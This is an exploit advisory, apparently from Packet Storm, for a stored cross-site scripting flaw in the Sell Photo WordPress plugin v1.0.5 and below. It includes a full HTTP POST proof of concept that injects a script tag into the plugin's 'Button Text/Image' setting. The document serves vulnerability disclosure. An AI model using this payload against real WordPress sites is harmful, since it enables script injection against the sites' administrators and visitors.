Share
## https://sploitus.com/exploit?id=PACKETSTORM:158872
# Exploit Title: Sell Photo Wordpress Plugin v1.0.5 - Persistent Cross-Site Scripting  
# Date: 2020-08-14  
# Vendor Homepage: https://noorsplugin.com/  
# Vendor Changelog: https://wordpress.org/plugins/sell-photo/#developers  
# Exploit Author: Melbin K Mathew (@melbinkm)  
# Author Advisory: https://melbin.in/2020/08/14/stored-xss-vulnerability-in-wordpress-sell-photo-plugin/  
# Author Homepage: https://melbin.in  
# Version: 1.0.5 and below  
  
1. Description  
  
The Sell Photo by naa986 is a WordPress Plugin used to sell images from WordPress Blogs with payment through PayPal. The 'Button Text/Image' field in Settings page of Sell Photos Plugin was found to be vulnerable to stored XSS, as they did not sanitize user given input properly. It is triggered when a users loads a page where the plugin is used, and when an admin opens settings page of the plugin. All WordPress websites using Sell Photo by naa986 version 1.0.5 and below are affected.  
  
2. Proof of Concept  
  
POST /w/wp-admin/options-general.php?page=sell-photo-settings HTTP/1.1  
Host: 127.0.0.1  
Content-Length: 339  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://127.0.0.1  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://127.0.0.1/w/wp-admin/options-general.php?page=sell-photo-settings  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: wordpress_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7Cb6923f10946ffce4a149ff702761391ed5ab2efed419261f5bd9d173281a1d95; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7C187d1919d81892688985d2acd9d7c8995a974ded5282ab8d15344dae9764a405; wp-settings-1=editor%3Dhtml; wp-settings-time-1=1597401311  
Connection: close  
  
_wpnonce=14d5bbccf9&_wp_http_referer=%2Fw%2Fwp-admin%2Foptions-general.php%3Fpage%3Dsell-photo-settings&enable_testmode=1&paypal_email=jajaja%40zopmail.com&currency_code=USD&price_amount=5.00&button_anchor=Buy+Now+%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E&return_url=http%3A%2F%2F95.217.19.38%2Fw&sell_photo_update_settings=Save+Changes